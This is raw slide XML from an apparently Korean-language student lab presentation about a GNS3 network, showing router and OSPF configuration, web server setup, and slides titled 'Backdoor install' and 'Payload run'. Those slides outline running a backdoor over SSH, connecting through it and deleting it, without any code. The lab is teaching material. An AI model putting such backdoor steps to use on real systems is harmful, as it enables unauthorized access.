                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>마무리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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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2A3618FF-C360-440B-8B35-AFA885F402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539" y="1879600"/>
            <a:ext cx="6107461" cy="2600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633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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>GNS3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>개인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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2" y="1968500"/>
            <a:ext cx="5913236" cy="7264400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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[R1] Config</a:t>
            </a:r>
          </a:p>
          <a:p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conf t</a:t>
            </a:r>
          </a:p>
          <a:p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int fa0/0					//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민지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조장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방향</a:t>
            </a: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ip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add 172.28.11.2 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p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no shut</a:t>
            </a:r>
          </a:p>
          <a:p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int fa1/0					//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칼리 방향</a:t>
            </a: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ip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add 192.168.180.254 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p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No shut</a:t>
            </a:r>
          </a:p>
          <a:p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int fa1/1					// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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윈서버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방향</a:t>
            </a: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ip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add 192.168.181.254 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p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no shut</a:t>
            </a:r>
          </a:p>
          <a:p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int fa2/0					// Cent7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방향</a:t>
            </a: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ip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add 192.168.182.254 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p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no shut</a:t>
            </a:r>
          </a:p>
          <a:p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int fa2/1					//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가상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PC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방향</a:t>
            </a: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ip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add 192.168.183.254 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p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no shut</a:t>
            </a:r>
          </a:p>
          <a:p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ip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route 0.0.0.0 0.0.0.0 172.28.11.1		// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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모르는건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조장 한테</a:t>
            </a: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router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ospf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1					</a:t>
            </a:r>
          </a:p>
          <a:p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network 172.28.11.0 0.0.0.255 area 0</a:t>
            </a:r>
          </a:p>
          <a:p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network 192.168.180.0 0.0.0.255 area 0</a:t>
            </a:r>
          </a:p>
          <a:p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network 192.168.181.0 0.0.0.255 area 0</a:t>
            </a:r>
          </a:p>
          <a:p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network 192.168.182.0 0.0.0.255 area 0</a:t>
            </a:r>
          </a:p>
          <a:p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network 192.168.183.0 0.0.0.255 area 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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GNS3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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세팅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1A3BA57-7F0B-48CE-857F-14A3DDDC6B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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266513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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>2. Backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>설치</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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실행을 위한 권한 부여</a:t>
            </a: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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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85800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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>마무리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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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DB47F62D-DCB0-475F-96D1-04747C66AC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379" y="1879600"/>
            <a:ext cx="5875085" cy="2953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07503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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>3. Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>구동</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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SSH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내에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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백도어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파일 실행</a:t>
            </a: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457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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백도어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파일로 통한 접속</a:t>
            </a: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457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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백도어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파일 삭제</a:t>
            </a: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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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85800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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>마무리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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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BADF1FA7-2318-426A-B892-8B4B4FAE5F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380" y="2004995"/>
            <a:ext cx="4797710" cy="50799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0595D0C-3261-416A-AF4F-33C1EE9558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381" y="3784656"/>
            <a:ext cx="5434934" cy="46524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A1D4040-B9FD-4CC0-9932-A7564A7AC7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380" y="2514291"/>
            <a:ext cx="5801535" cy="1305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485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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>GNS3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>조별</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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GNS3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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세팅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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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CB3D1414-98C3-497F-ADA2-CEEAF7689B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691" y="3054295"/>
            <a:ext cx="6004619" cy="4134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236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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12A34401-599B-45B7-85F2-254DBEDFA9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="241297"/>
            <a:ext cx="6349993" cy="9397999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="20000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="사각형: 둥근 위쪽 모서리 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1898EFCF-EF1C-40AB-BA71-A382CFBBA3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2724152" y="-57143"/>
            <a:ext cx="2298698" cy="5460990"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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7" name="제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4B6E55-904B-464D-918A-13440A5DEE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3531" y="1996900"/>
            <a:ext cx="4933945" cy="1352903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Web Server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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</a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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세팅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="부제목 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F900AFB5-8FB4-429A-A1A5-D8BC883ECC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79568" y="4009144"/>
            <a:ext cx="4841870" cy="842224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/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24852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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Service Start</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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apache2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와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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mysql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서비스를 실행시킨다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 </a:t>
            </a:r>
          </a:p>
          <a:p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설치되어 있지 않다면</a:t>
            </a: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yum install -y apache2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mysql</a:t>
            </a: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명령어로 설치한다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  <a:p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en-US" altLang="ko-KR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mysql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이 설치되지 않을 시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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mysql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-server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설치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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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세팅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F497BAFF-A3AA-4C33-B9B4-00AC67500DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5913238" cy="4686300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Console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
